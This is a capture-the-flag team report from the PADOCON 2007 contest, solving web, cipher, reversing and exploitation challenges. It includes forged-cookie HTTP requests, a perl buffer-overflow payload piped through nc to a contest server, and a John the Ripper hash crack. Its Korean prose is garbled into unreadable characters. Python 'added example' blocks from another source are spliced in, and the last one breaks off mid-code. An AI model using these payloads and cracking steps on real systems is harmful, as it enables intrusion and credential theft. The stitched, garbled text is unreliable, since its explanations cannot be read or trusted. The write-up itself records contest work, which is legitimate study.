PAraDox COnfereNce 2007 Capture The Flag
----------------------------------------
wow38317 team report
--------------------

-
	ȸ  Ȥ     Ǯ̼ Դϴ.
	ž ȸ ϴٺ   ص ʾƼ ڼ Ǯ̸   ̸   帳ϴ.
-





=============
Stage1, Bingo
=============

unhash )
־  ִ hash  Ǯ s3xypad0c5n ̶    ־ϴ.





Cookie )
padowave=key  Ű Ư  ġ Delete , 信 Ѿ⶧
Ű   ǳ   ٷ ûϿ Ʒ   Ͽϴ.

[hkpco@ns hkpco]$ telnet 155.230.251.100 80
Trying 155.230.251.100...
Connected to 155.230.251.100.
Escape character is '^]'.
GET http://155.230.251.100/~q4/mong/kite815/result.php HTTP/1.0
Cookie: padowave=key

HTTP/1.1 200 OK
Date: Fri, 19 Jan 2007 04:30:08 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Accept-Ranges: bytes
X-Powered-By: PHP/4.2.2
Content-Length: 73
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<img src='pado.jpg'><br><br>Bravo! н 'padowaveshocking' Դϴ.
Connection closed by foreign host.





Ajax )
ش  source-view  ڹٽũƮ  Ͽ  ּҸ   ־ϴ.

[hkpco@ns public_html]$ telnet 155.230.251.17 80
Trying 155.230.251.17...
Connected to 155.230.251.17.
Escape character is '^]'.
GET http://155.230.251.17/~hack2/sorry.php HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 19 Jan 2007 17:41:16 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Content-Length: 185
Connection: close
Content-Type: text/html; charset=euckr

<html>
        <script type='text/javascript' src='./aj.js'></script>
        <script type='text/javascript' src='./req.js'></script>
        <body onload=stupid()>
        <div id=ps></div>
        </body>
</html>Connection closed by foreign host.
[hkpco@ns public_html]$


- req.js -
.
.
.
			el.innerHTML = seg;
		}
	}
	url = './wanted.php'; <-  
	req.open('GET', url, true);
	req.send('');
.
.
.
- end -

http://155.230.251.17/~hack2/wanted.php
passwd : yousogood





Shuffle)
 ϴٰ  ʽ  ɷȽϴ.

============================
Bonus  Դϴ.
Password : OverTheRainbow
߰  ʽ....
============================





Crack )
MyCTF_14.exe   ʰ   Ͽ ȣȭ ڿ ġ׽ϴ.
(  캸 α׷ Ģ ã  ֽϴ. )

 SeriesAndEncryption





Disassemble )
 α׷ 𽺾  ̿Ͽ  ϴ Դϴ.
calculationκ  캸    ֽϴ.
switch ̿ ԼԴϴ.

0x08048465 <calculation+0>:     push   %ebp
0x08048466 <calculation+1>:     mov    %esp,%ebp
0x08048468 <calculation+3>:     sub    $0xc,%esp
0x0804846b <calculation+6>:     mov    0x8(%ebp),%eax
0x0804846e <calculation+9>:     mov    %al,0xffffffff(%ebp)
0x08048471 <calculation+12>:    movsbl 0xffffffff(%ebp),%eax
0x08048475 <calculation+16>:    sub    $0x43,%eax
0x08048478 <calculation+19>:    mov    %eax,0xfffffff4(%ebp)
0x0804847b <calculation+22>:    cmpl   $0x2f,0xfffffff4(%ebp)
0x0804847f <calculation+26>:    ja     0x80484d5 <calculation+112>
0x08048481 <calculation+28>:    mov    0xfffffff4(%ebp),%edx
0x08048484 <calculation+31>:    mov    0x80485ec(,%edx,4),%eax
0x0804848b <calculation+38>:    jmp    *%eax
0x0804848d <calculation+40>:    movl   $0x4d,0xfffffff8(%ebp)
0x08048494 <calculation+47>:    jmp    0x80484dc <calculation+119>
0x08048496 <calculation+49>:    movl   $0x69,0xfffffff8(%ebp)
0x0804849d <calculation+56>:    jmp    0x80484dc <calculation+119>
0x0804849f <calculation+58>:    movl   $0x6c,0xfffffff8(%ebp)
0x080484a6 <calculation+65>:    jmp    0x80484dc <calculation+119>
0x080484a8 <calculation+67>:    movl   $0x6b,0xfffffff8(%ebp)
0x080484af <calculation+74>:    jmp    0x80484dc <calculation+119>
0x080484b1 <calculation+76>:    movl   $0x79,0xfffffff8(%ebp)
0x080484b8 <calculation+83>:    jmp    0x80484dc <calculation+119>
0x080484ba <calculation+85>:    movl   $0x77,0xfffffff8(%ebp)
0x080484c1 <calculation+92>:    jmp    0x80484dc <calculation+119>
0x080484c3 <calculation+94>:    movl   $0x61,0xfffffff8(%ebp)
0x080484ca <calculation+101>:   jmp    0x80484dc <calculation+119>
0x080484cc <calculation+103>:   movl   $0x79,0xfffffff8(%ebp)
0x080484d3 <calculation+110>:   jmp    0x80484dc <calculation+119>
0x080484d5 <calculation+112>:   movl   $0x2a,0xfffffff8(%ebp)
0x080484dc <calculation+119>:   mov    0xfffffff8(%ebp),%eax
0x080484df <calculation+122>:   leave
0x080484e0 <calculation+123>:   ret

߿ κи Ÿ 

switch( value )
{
	case 'C':
		return 'M';

	case 'l':
		return 'i';

	case 'e':
		return 'l';

	case 'a':
		return 'k';

	case 'r':
		return 'y';

	case 'L':
		return 'w';

	case 'i':
		return 'a';

	case 'n':
		return 'y';

	default:
		return '*';
}

׷Ƿ , Milkyway
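Added example (not part of the wow38317 report): a Python model of the `calculation` routine disassembled above. It reproduces what the code actually does rather than only the final switch: the argument is taken as a signed char (movsbl), 0x43 ('C') is subtracted, and the result is compared unsigned against 0x2f (ja), so a character below 'C' wraps to a huge index and lands in the default '*' case just like one above 'r'. The 48-entry jump table at 0x80485ec was not dumped in the report, so it is rebuilt here from the eight cases shown; the input string "ClearLin" is constructed for this example.

```python
# Added example: emulate the 32-bit x86 `calculation` switch shown above.
# Case/return pairs come from the writeup; the jump table itself was not
# dumped on the page, so it is rebuilt from those eight cases.

TABLE_BASE = 0x43    # sub    $0x43,%eax            ('C')
TABLE_LIMIT = 0x2f   # cmpl   $0x2f ... ja default  (48 entries: 0..0x2f)
DEFAULT = '*'        # movl   $0x2a -> '*'

CASES = {
    'C': 'M', 'l': 'i', 'e': 'l', 'a': 'k',
    'r': 'y', 'L': 'w', 'i': 'a', 'n': 'y',
}


def build_jump_table():
    """Index -> returned char, mirroring 0x80485ec(,%edx,4) for idx 0..0x2f."""
    table = [DEFAULT] * (TABLE_LIMIT + 1)
    for ch, out in CASES.items():
        idx = ord(ch) - TABLE_BASE
        if not 0 <= idx <= TABLE_LIMIT:
            raise ValueError(f"case {ch!r} falls outside the 48-entry table")
        table[idx] = out
    return table


JUMP_TABLE = build_jump_table()


def calculation(byte_value):
    """Model of calculation(char): returns the mapped character."""
    # mov %al,-1(%ebp); movsbl -1(%ebp),%eax  -> sign-extend the low byte
    b = byte_value & 0xff
    signed = b - 0x100 if b >= 0x80 else b
    # sub $0x43,%eax, then the unsigned compare (ja) against 0x2f:
    # a negative result wraps to a large unsigned index and takes the default
    idx = (signed - TABLE_BASE) & 0xffffffff
    if idx > TABLE_LIMIT:
        return DEFAULT
    return JUMP_TABLE[idx]


def translate(text):
    """Run every character of `text` through calculation()."""
    return ''.join(calculation(ord(c)) for c in text)


if __name__ == '__main__':
    # Constructed input: the case labels in the order that yields the flag.
    print(translate('ClearLin'))
```

The point of modelling the compare rather than using a plain dictionary is the boundary behaviour: 'r' is index 0x2f (the last table slot), 's' is 0x30 and falls through to '*', and anything below 'C' or above 0x7f does the same after the sign extension and unsigned compare.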





BufferOverFlow )
! ڸ ̿Ͽ ּҰ   BOF ̿Ͽ ִ bufferּҸ ϵ Ͽϴ.

[hkpco@ns hkpco]$ (perl -e 'print "\x21"x12,"\xe0\xa2\x04\x08"') | nc 155.230.251.17 5553

################ <Address Information> #################

&ReadBuffer:            0xfee7a820
&KeywordAddress:        0x804a2e0
&printPtr:              0xfee7a414
*printPtr:              0xfee7a420
&start resultBuffer:    0xfee7a420
&end resultBuffer:      0xfee7a420

<HinT: !!!>
########################################################

Solution>
################ <Address Information> #################

&ReadBuffer:            0xfee7a820
&KeywordAddress:        0x804a2e0
&printPtr:              0xfee7a414
*printPtr:              0x804a2e0
&start resultBuffer:    0xfee7a420
&end resultBuffer:      0xfee7a418

<HinT: !!!>
########################################################

ResultPrint>Congretuation!!
NextPassword: aWorldWhereAnythingIsPossible





Sensitive )
簢 ׸   簢 4 ̴ 簢 4 ֽϴ.
̴ 簢  簢  ߾մϴ.
ߴ  Cookie base64 ڵ Ų  4    ٽ  2  ش 簢 x,yǥ ˴ϴ.
˾ ̿Ͽ ǥ ˾   base64 ڵϿ    ϰ    ־ϴ.

[hkpco@ns ctf2007]$ GET http://155.230.251.91/~fortune/ABD70838C9D85E38B6191870B40F21C0.php HTTP/1.0
Referer: http://155.230.251.91/~fortune/hardcore1.php
Host: 155.230.251.91
Cookie: SESSIONID=MjUzZTc5MjIxOThhOUM4MQ==


Congratulations! Authentication Code: Ker@ber@$
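Added example (not from the report) covering both cookie challenges above, the `padowave=key` cookie and the base64 `SESSIONID`. The first function decodes the SESSIONID value from the request above the way the report describes it (base64, then four groups giving an x,y pair each); that the four-character groups are two hex bytes is this example's reading. The rest shows the server-side mitigation: both challenges trust state the client can edit, and an HMAC over the cookie value with a server secret makes an edited or forged value fail verification. The secret here is a constructed placeholder.

```python
import base64
import hashlib
import hmac

# Cookie value taken from the writeup's request above.
SESSION_COOKIE = "MjUzZTc5MjIxOThhOUM4MQ=="


def decode_session_cookie(value):
    """Decode SESSIONID as the writeup reads it: base64, then four 4-character
    groups, each 2 hex characters of x followed by 2 of y.
    (Treating the groups as hex byte pairs is this example's assumption.)"""
    raw = base64.b64decode(value).decode('ascii')
    if len(raw) != 16:
        raise ValueError(f"expected 16 characters, got {len(raw)}")
    groups = [raw[i:i + 4] for i in range(0, 16, 4)]
    return [(int(g[:2], 16), int(g[2:], 16)) for g in groups]


# Mitigation: never trust client-editable state such as padowave=key or a
# base64 coordinate list. Sign the value with a server secret so that an
# edited cookie is rejected before any of its content is used.
SERVER_SECRET = b"constructed-demo-secret"   # constructed placeholder


def sign_cookie(payload, secret=SERVER_SECRET):
    """Append an HMAC-SHA256 tag: payload.tag"""
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_cookie(cookie, secret=SERVER_SECRET):
    """Return the payload if the tag checks out, otherwise None."""
    payload, sep, tag = cookie.rpartition('.')
    if not sep:
        return None
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return payload


if __name__ == '__main__':
    print(decode_session_cookie(SESSION_COOKIE))
    signed = sign_cookie(SESSION_COOKIE)
    print(verify_cookie(signed))
    # Swap in a different payload under the same tag: rejected.
    forged = "forged." + signed.rpartition('.')[2]
    print(verify_cookie(forged))
    # A bare static value such as the first challenge's cookie: rejected.
    print(verify_cookie("padowave=key"))
```

`hmac.compare_digest` is used for the tag comparison so that the check does not leak how many leading characters of the tag matched.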





Steganography )
 ִ escapeڿ ٲپ ָ ڹٽũƮ ҽ ִµ  ҽ #P%A!D@O$R$I!D%A  Ű   ֽϴ.
Ű ̿Ͽ S-TOOL̶ װ׷ α׷  ߽ϴ.

            [[[[[[[[մϴ.]]]]]]]]]]]
 ----------------------------------------------------
|                   н                     |
 ----------------------------------------------------
| Truth will win out in the long run.                |
 ----------------------------------------------------





ȣȭĢ )
: http://155.230.251.77/~kertAdmin/garam5th

Guest α Ͽ  йȣ ȣȭϿ Ÿϴ.
 ڵ ε ѵ ڿ ٲ𶧸 Ű ٲϴ.
Admin2007 ԽŰ  ʿ ڿ ڵ  Ͽ  ϴ.
, EoRkfwhgdmsQksWb29724791





Ϲġȯȣ )
  ִ  ڵ  󵵿 Ϲ ĺ  󵵸 ϴ Դϴ.
ϳ  Ͽ  س  ߽ϴ.
, alien





ȭ )
ȭ  ش Wav   ļ м غ

ļ , , Ϸ    ְ
ļ , , Ϸ    ֽϴ.

Cooledit ؼ ش Wav  м ϸ       ְ
̰ Ʒ ȭ ư ļ 뿪 ϸ ش ư     մϴ.
׸ ش ư  ĺ ãƼ 񱳸 غ ˴ϴ.

, hackingandsecurity





crack )
lastSAMϳ /etc/shadowϰ  Ͽϴ.
john the ripper ̿Ͽ  ߽ϴ.

[hkpco@ns run]$ cat ct
padocon:1006:3A2031B32E4880E0AAD3B435B51404EE:C75B184F1A53D557945F640A370AE3F8:::
[hkpco@ns run]$ ./john -show ct
padocon:OKAY:1006:C75B184F1A53D557945F640A370AE3F8:::

1 password cracked, 0 left

, okay







======
Stage2
======

ù° )

LEA ESI,DWORD PTR DS:[EDX-2]
MOV EDI,ESI
IMUL EDI,ESI
LEA ESI,DWORD PTR DS:[EDI*4-10]	 
TEST ESI,ESI
.
.
LEA EBX,DWORD PTR DS:[EDX*4]
MOV EDI,DWORD PTR DS:[ECX+4E4]
LEA ESI,DWORD PTR DS:[EBX-3]
IMUL ESI,EDX
CMP EDI,ESI
.
.
MOV ESI,DWORD PTR DS:[ECX+4EC]
LEA EDX,DWORD PTR DS:[EDX+EDX*4]
SUB EDX,EDI
ADD EDX,2B
CMP ESI,EDX

a-b-c-d  ø ִٰ ϰ, b,c,dκ ƾ  ش opcode ؼϸ ø   ֽϴ.
( a κ   κԴϴ. )
 ø 777-52-4-11 ̸, α׷ Էϸ johnsonsbaby  ɴϴ.
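Added example (not from the report): the three checks from the OllyDbg listing above carried through as arithmetic, with the page's register reading: EDX holds c, [ECX+4E4] holds b, [ECX+4EC] holds d, and the a part is never referenced by these checks. OllyDbg immediates are hex, so -10 is -16 and 2B is 43. The first check requires 4*(c-2)^2 - 16 == 0, the second b == (4c-3)*c, the third d == 5c - b + 43; solving them reproduces 52-4-11. The enumeration also shows that c=0 passes the first check, which the arithmetic permits even though the report used c=4.

```python
# Added example: the serial checks from the disassembly above, written out.
# Register reading: EDX = c, [ECX+4E4] = b, [ECX+4EC] = d; a is not checked.


def check1(c):
    """LEA ESI,[EDX-2]; IMUL EDI,ESI; LEA ESI,[EDI*4-10]; TEST ESI,ESI
    -> 4*(c-2)^2 - 0x10 must be zero."""
    return 4 * (c - 2) ** 2 - 0x10 == 0


def expected_b(c):
    """LEA EBX,[EDX*4]; LEA ESI,[EBX-3]; IMUL ESI,EDX; CMP EDI,ESI
    -> b must equal (4c - 3) * c."""
    return (4 * c - 3) * c


def expected_d(b, c):
    """LEA EDX,[EDX+EDX*4]; SUB EDX,EDI; ADD EDX,2B; CMP ESI,EDX
    -> d must equal 5c - b + 0x2B."""
    return 5 * c - b + 0x2B


def valid(serial):
    """Check an a-b-c-d serial against all three conditions."""
    a, b, c, d = (int(p) for p in serial.split('-'))
    return check1(c) and b == expected_b(c) and d == expected_d(b, c)


def solve(c_range=range(0, 256)):
    """Enumerate c values passing check1 and derive (b, c, d) for each."""
    out = []
    for c in c_range:
        if check1(c):
            b = expected_b(c)
            out.append((b, c, expected_d(b, c)))
    return out


if __name__ == '__main__':
    print(solve())
    print(valid('777-52-4-11'))
```

The model ignores 32-bit wraparound, which is irrelevant for values this small but would matter if the enumeration were widened to large c.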





ι° )

: http://155.230.251.100/~q2/vani/
ҽ⸦ غ,

<html>
	<script type='text/javascript' src='./aj.js'></script>
	<script type='text/javascript' src='./xhttpreq.js'></script>
	<body onload=Kronos()>
	 ޿   .<br>
		   ƴٴ    ӿ Դ.<br><br>
		ӿ ǵ ȵ γ ǳ  ַַ ĳ ʹ Ҹ ȭӰ Ѵ.<br>
		  鼭   ʴ  帮,  鸮  Ҹ  δ.<br><br>
		Ҹ      ִٴ  , ħ  Ҹ ٿ ߰ߴ.<br>
		ű⿣, 12 絵   6  ѳ ־.  ѹ..ѹ.. <br><br>
		 𰡿 Ȧ   絵 ϴ ൿ Ѻ   ۿ , ġ    .. ƴ, Ҵ Ű澲   絵 ð °͵  ä   ɵҴ.<br>
		 п   絵 Ѻ , Դ    ִµ.. Ȧغ .
		׷ ޿  ð  ݳ ְ,  絵 ι ٽ  ޼  ʾҴ.<br><br>
		  ﳪ  絵 ߾ϸ..<br>
			<br>
	!!No DoS please~!!
	<!--
	<div id='here'></div>
	-->
	</body>
</html>

ڹٽũƮ Ͽ ִ  ãϴ.

- xhttpreq.js -
.
.
.
	url = './ace.php';
	req.open('GET', url, true);
	req.send('');
.
.
.
- end -

ace.php  ̿Ͽ    ֽϴ.

[hkpco@ns ctf2007]$ telnet 155.230.251.100 80
Trying 155.230.251.100...
Connected to 155.230.251.100.
Escape character is '^]'.
GET http://155.230.251.100/~q2/vani/ace.php.bak HTTP/1.0
.
.
.
.........t1m3_By_K3R7
.
.
.

 t1m3_By_K3R7





° )

:
 ưż ٽ  Ǫʽÿ.
Ư 3 Ǯ  ϸ  ɴϴ.

  ζ  ִ   ܾ Ͽ մϴ.





׹° )

:
 ʿ Դϴ.
ctf.padocon@gmail.com  ֽø
 ص帮ڽϴ.

 index.html wget ޾Ƽ xxd ̿Ͽ 캾ϴ.
 ELFΰ   Ǵ°   ֽϴ.

gdb ̿Ͽ    ,

[hkpco@ns ctf2007]$ gdb -q index.html
(gdb) disassemble main
Dump of assembler code for function main:
0x08048784 <main+0>:    push   %ebp
0x08048785 <main+1>:    mov    %esp,%ebp
0x08048787 <main+3>:    sub    $0x48,%esp
0x0804878a <main+6>:    and    $0xfffffff0,%esp
0x0804878d <main+9>:    mov    $0x0,%eax
0x08048792 <main+14>:   sub    %eax,%esp
0x08048794 <main+16>:   sub    $0x4,%esp
0x08048797 <main+19>:   push   $0x0
0x08048799 <main+21>:   push   $0x1
0x0804879b <main+23>:   push   $0x2
.
.
.
0x08048891 <main+269>:  push   $0x8048fc5
0x08048896 <main+274>:  call   0x8048624 <printf>
0x0804889b <main+279>:  add    $0x10,%esp
0x0804889e <main+282>:  jmp    0x804885e <main+218>
0x080488a0 <main+284>:  call   0x80488bd <recive>
0x080488a5 <main+289>:  sub    $0xc,%esp
0x080488a8 <main+292>:  pushl  0x804a3b0
0x080488ae <main+298>:  call   0x8048594 <close>
0x080488b3 <main+303>:  add    $0x10,%esp
0x080488b6 <main+306>:  jmp    0x804885e <main+218>
0x080488b8 <main+308>:  mov    0xffffffc0(%ebp),%eax
0x080488bb <main+311>:  leave
0x080488bc <main+312>:  ret
End of assembler dump.

recive  Լ Դϴ.

(gdb) disassemble recive
Dump of assembler code for function recive:
0x080488bd <recive+0>:  push   %ebp
0x080488be <recive+1>:  mov    %esp,%ebp
0x080488c0 <recive+3>:  sub    $0xc18,%esp
0x080488c6 <recive+9>:  movl   $0x0,0xfffff404(%ebp)
0x080488d0 <recive+19>: movl   $0x0,0xfffff3fc(%ebp)
0x080488da <recive+29>: mov    0x4(%ebp),%eax
0x080488dd <recive+32>: mov    %eax,0xfffff3f8(%ebp)
0x080488e3 <recive+38>: push   $0x0
0x080488e5 <recive+40>: push   $0x3e8
0x080488ea <recive+45>: lea    0xfffff408(%ebp),%eax
0x080488f0 <recive+51>: push   %eax
0x080488f1 <recive+52>: pushl  0x804a3b0
0x080488f7 <recive+58>: call   0x80486a4 <recv>
0x080488fc <recive+63>: add    $0x10,%esp
.
.
.
0x080489bc <recive+255>:        mov    %eax,0xfffff3f4(%ebp)
0x080489c2 <recive+261>:        mov    0xfffff3f8(%ebp),%eax
0x080489c8 <recive+267>:        cmp    0xfffff3f4(%ebp),%eax
0x080489ce <recive+273>:        je     0x80489d2 <recive+277>
0x080489d0 <recive+275>:        jmp    0x80489e4 <recive+295>
0x080489d2 <recive+277>:        sub    $0xc,%esp
0x080489d5 <recive+280>:        lea    0xfffff7f8(%ebp),%eax
0x080489db <recive+286>:        push   %eax
0x080489dc <recive+287>:        call   0x80489e6 <parse>
0x080489e1 <recive+292>:        add    $0x10,%esp
0x080489e4 <recive+295>:        leave
0x080489e5 <recive+296>:        ret
End of assembler dump.

parse  Լ Դϴ.

(gdb) disassemble parse
Dump of assembler code for function parse:
0x080489e6 <parse+0>:   push   %ebp
0x080489e7 <parse+1>:   mov    %esp,%ebp
0x080489e9 <parse+3>:   sub    $0x17e8,%esp
0x080489ef <parse+9>:   movl   $0x0,0xfffffbf4(%ebp)
0x080489f9 <parse+19>:  movl   $0x0,0xffffe854(%ebp)
0x08048a03 <parse+29>:  movl   $0x0,0xffffe84c(%ebp)
0x08048a0d <parse+39>:  sub    $0xc,%esp
0x08048a10 <parse+42>:  pushl  0x8(%ebp)
0x08048a13 <parse+45>:  call   0x80485f4 <strlen>
0x08048a18 <parse+50>:  add    $0x10,%esp
0x08048a1b <parse+53>:  cmp    %eax,0xffffe84c(%ebp)
0x08048a21 <parse+59>:  jb     0x8048a28 <parse+66>
0x08048a23 <parse+61>:  jmp    0x8048c99 <parse+691>
0x08048a28 <parse+66>:  mov    0xffffe84c(%ebp),%eax
.
.
.
0x08048dfd <parse+1047>:        push   $0x1388
0x08048e02 <parse+1052>:        lea    0xffffe858(%ebp),%eax
0x08048e08 <parse+1058>:        push   %eax
0x08048e09 <parse+1059>:        pushl  0x804a3b0
0x08048e0f <parse+1065>:        call   0x8048674 <send>
0x08048e14 <parse+1070>:        add    $0x10,%esp
0x08048e17 <parse+1073>:        leave
0x08048e18 <parse+1074>:        ret
End of assembler dump.
(gdb)

û ϴ. Ƹ  û м/óϴ κ ϴ.
  Լ Ǿ ڽϴ.

(gdb) info func
All defined functions:

Non-debugging symbols:
0x0804854c  _init
0x08048574  localtime
0x08048584  strcmp
0x08048594  close
0x080485a4  accept
0x080485b4  listen
0x080485c4  strftime
0x080485d4  time
0x080485e4  fgets
0x080485f4  strlen
0x08048604  __libc_start_main
0x08048614  strcat
0x08048624  printf
0x08048634  bind
0x08048644  fclose
0x08048654  exit
0x08048664  sscanf
0x08048674  send
0x08048684  htons
0x08048694  fopen
0x080486a4  recv
0x080486b4  sprintf
0x080486c4  socket
0x080486f8  call_gmon_start
0x0804871c  __do_global_dtors_aux
0x08048758  frame_dummy
0x08048784  main
0x080488bd  recive
0x080489e6  parse
0x08048e19  target
0x08048edc  __libc_csu_init
0x08048f0c  __libc_csu_fini
0x08048f40  __do_global_ctors_aux
0x08048f64  _fini

target̶ Լ ֽϴ.

(gdb) disassemble target
Dump of assembler code for function target:
0x08048e19 <target+0>:  push   %ebp
0x08048e1a <target+1>:  mov    %esp,%ebp
0x08048e1c <target+3>:  sub    $0x298,%esp
0x08048e22 <target+9>:  sub    $0x8,%esp
0x08048e25 <target+12>: push   $0x80491e2
0x08048e2a <target+17>: push   $0x80491e4
0x08048e2f <target+22>: call   0x8048694 <fopen>
0x08048e34 <target+27>: add    $0x10,%esp
0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)
0x08048e3a <target+33>: sub    $0x4,%esp
0x08048e3d <target+36>: pushl  0xfffffff4(%ebp)
0x08048e40 <target+39>: push   $0x64
0x08048e42 <target+41>: lea    0xffffff78(%ebp),%eax
0x08048e48 <target+47>: push   %eax
0x08048e49 <target+48>: call   0x80485e4 <fgets>
0x08048e4e <target+53>: add    $0x10,%esp
0x08048e51 <target+56>: sub    $0xc,%esp
0x08048e54 <target+59>: pushl  0xfffffff4(%ebp)
0x08048e57 <target+62>: call   0x8048644 <fclose>
0x08048e5c <target+67>: add    $0x10,%esp
0x08048e5f <target+70>: lea    0xffffff78(%ebp),%eax
0x08048e65 <target+76>: push   %eax
0x08048e66 <target+77>: lea    0xffffff78(%ebp),%eax
0x08048e6c <target+83>: sub    $0x8,%esp
0x08048e6f <target+86>: push   %eax
0x08048e70 <target+87>: call   0x80485f4 <strlen>
0x08048e75 <target+92>: add    $0xc,%esp
0x08048e78 <target+95>: push   %eax
0x08048e79 <target+96>: push   $0x8049200
0x08048e7e <target+101>:        lea    0xfffffd78(%ebp),%eax
0x08048e84 <target+107>:        push   %eax
0x08048e85 <target+108>:        call   0x80486b4 <sprintf>
0x08048e8a <target+113>:        add    $0x10,%esp
0x08048e8d <target+116>:        push   $0x0
0x08048e8f <target+118>:        push   $0x1f4
0x08048e94 <target+123>:        lea    0xfffffd78(%ebp),%eax
0x08048e9a <target+129>:        push   %eax
0x08048e9b <target+130>:        pushl  0x804a3b0
0x08048ea1 <target+136>:        call   0x8048674 <send>
0x08048ea6 <target+141>:        add    $0x10,%esp
0x08048ea9 <target+144>:        mov    %eax,0xfffffd74(%ebp)
0x08048eaf <target+150>:        sub    $0xc,%esp
0x08048eb2 <target+153>:        pushl  0x804a3b0
0x08048eb8 <target+159>:        call   0x8048594 <close>
0x08048ebd <target+164>:        add    $0x10,%esp
0x08048ec0 <target+167>:        sub    $0xc,%esp
0x08048ec3 <target+170>:        pushl  0x804a3ac
0x08048ec9 <target+176>:        call   0x8048594 <close>
0x08048ece <target+181>:        add    $0x10,%esp
0x08048ed1 <target+184>:        sub    $0xc,%esp
0x08048ed4 <target+187>:        push   $0x0
0x08048ed6 <target+189>:        call   0x8048654 <exit>
0x08048edb <target+194>:        nop
End of assembler dump.

Ƹ  ִ   ȣ ѷִ κ ϴ.

0x08048e25 <target+12>: push   $0x80491e2
0x08048e2a <target+17>: push   $0x80491e4
0x08048e2f <target+22>: call   0x8048694 <fopen>
0x08048e34 <target+27>: add    $0x10,%esp
0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)

   ڽϴ.

(gdb) x/s 0x80491e2
0x80491e2 <_IO_stdin_used+606>:  "r"
(gdb) x/s 0x80491e4
0x80491e4 <_IO_stdin_used+608>:  "passwd"
(gdb)

fp = fopen( "passwd" , "r" );

passwd ϴ.

0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)
0x08048e3a <target+33>: sub    $0x4,%esp
0x08048e3d <target+36>: pushl  0xfffffff4(%ebp)
0x08048e40 <target+39>: push   $0x64
0x08048e42 <target+41>: lea    0xffffff78(%ebp),%eax
0x08048e48 <target+47>: push   %eax
0x08048e49 <target+48>: call   0x80485e4 <fgets>
0x08048e4e <target+53>: add    $0x10,%esp

fgets( buffer , 100(0x64) , fp );

fgets ̿Ͽ   buffer оԴϴ.

0x08048e51 <target+56>: sub    $0xc,%esp
0x08048e54 <target+59>: pushl  0xfffffff4(%ebp)
0x08048e57 <target+62>: call   0x8048644 <fclose>
0x08048e5c <target+67>: add    $0x10,%esp

fclose(fp);

 ũ͸ ݽϴ.

0x08048e5f <target+70>: lea    0xffffff78(%ebp),%eax
0x08048e65 <target+76>: push   %eax
0x08048e66 <target+77>: lea    0xffffff78(%ebp),%eax
0x08048e6c <target+83>: sub    $0x8,%esp
0x08048e6f <target+86>: push   %eax
0x08048e70 <target+87>: call   0x80485f4 <strlen>
0x08048e75 <target+92>: add    $0xc,%esp
0x08048e78 <target+95>: push   %eax
0x08048e79 <target+96>: push   $0x8049200
0x08048e7e <target+101>:        lea    0xfffffd78(%ebp),%eax
0x08048e84 <target+107>:        push   %eax
0x08048e85 <target+108>:        call   0x80486b4 <sprintf>
0x08048e8a <target+113>:        add    $0x10,%esp

(gdb) x/s 0x8049200
0x8049200 <_IO_stdin_used+636>:  "HTTP/1.1 200 OK\nContent-Length: %d\nContetnt-Type: text/html; charset=iso-8859-1\n\n%s"

sprintf( buffer , "HTTP/1.1 200 OK\nContent-Length: %d\nContetnt-Type: text/html; charset=iso-8859-1\n\n%s" , strlen(buffer) , buffer );

buffer ۵ û ϴ.

0x08048e8d <target+116>:        push   $0x0
0x08048e8f <target+118>:        push   $0x1f4
0x08048e94 <target+123>:        lea    0xfffffd78(%ebp),%eax
0x08048e9a <target+129>:        push   %eax
0x08048e9b <target+130>:        pushl  0x804a3b0
0x08048ea1 <target+136>:        call   0x8048674 <send>
0x08048ea6 <target+141>:        add    $0x10,%esp

send( client , buffer , 500(0x1f4) , 0 );

socket Ŭ̾Ʈ ݴϴ.

0x08048ea9 <target+144>:        mov    %eax,0xfffffd74(%ebp)
0x08048eaf <target+150>:        sub    $0xc,%esp
0x08048eb2 <target+153>:        pushl  0x804a3b0
0x08048eb8 <target+159>:        call   0x8048594 <close>
0x08048ebd <target+164>:        add    $0x10,%esp

close( client );

 ڸ ݽϴ.

0x08048ec0 <target+167>:        sub    $0xc,%esp
0x08048ec3 <target+170>:        pushl  0x804a3ac
0x08048ec9 <target+176>:        call   0x8048594 <close>
0x08048ece <target+181>:        add    $0x10,%esp

close( sockfd );

 ڸ ݽϴ.

0x08048ed1 <target+184>:        sub    $0xc,%esp
0x08048ed4 <target+187>:        push   $0x0
0x08048ed6 <target+189>:        call   0x8048654 <exit>

exit(0);

մϴ.

⼭ fopenκи  Ƶ  ִ  "passwd"    ֽϴ.
passwd ûغ    ֽϴ.

http://155.230.251.100/~q3/hyungee/koziro4/passwd
, password is Exelsior&Rgent
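Added example (not from the report): a small parser for the gdb `disassemble` output used throughout this challenge. It turns each line into (address, symbol, mnemonic, operands), then pairs every `call` with the operands pushed since the previous call, reversed into cdecl argument order. Run over the `target` lines above it recovers fopen(0x80491e4, 0x80491e2), fgets(%eax, 0x64, fp) and send(sock, %eax, 0x1f4, 0), the same calls the report reconstructed by hand. The sample text is copied from the dump above; the function and regex names are this example's own.

```python
import re

# Constructed sample: lines copied from the `target` dump above (the fopen,
# fgets and send call sites).
GDB_DUMP = """\
0x08048e25 <target+12>: push   $0x80491e2
0x08048e2a <target+17>: push   $0x80491e4
0x08048e2f <target+22>: call   0x8048694 <fopen>
0x08048e34 <target+27>: add    $0x10,%esp
0x08048e37 <target+30>: mov    %eax,0xfffffff4(%ebp)
0x08048e3a <target+33>: sub    $0x4,%esp
0x08048e3d <target+36>: pushl  0xfffffff4(%ebp)
0x08048e40 <target+39>: push   $0x64
0x08048e42 <target+41>: lea    0xffffff78(%ebp),%eax
0x08048e48 <target+47>: push   %eax
0x08048e49 <target+48>: call   0x80485e4 <fgets>
0x08048e4e <target+53>: add    $0x10,%esp
0x08048e8d <target+116>:        push   $0x0
0x08048e8f <target+118>:        push   $0x1f4
0x08048e94 <target+123>:        lea    0xfffffd78(%ebp),%eax
0x08048e9a <target+129>:        push   %eax
0x08048e9b <target+130>:        pushl  0x804a3b0
0x08048ea1 <target+136>:        call   0x8048674 <send>
"""

LINE_RE = re.compile(r'^(0x[0-9a-f]+)\s+<([^>]+)>:\s+(\S+)\s*(.*)$')
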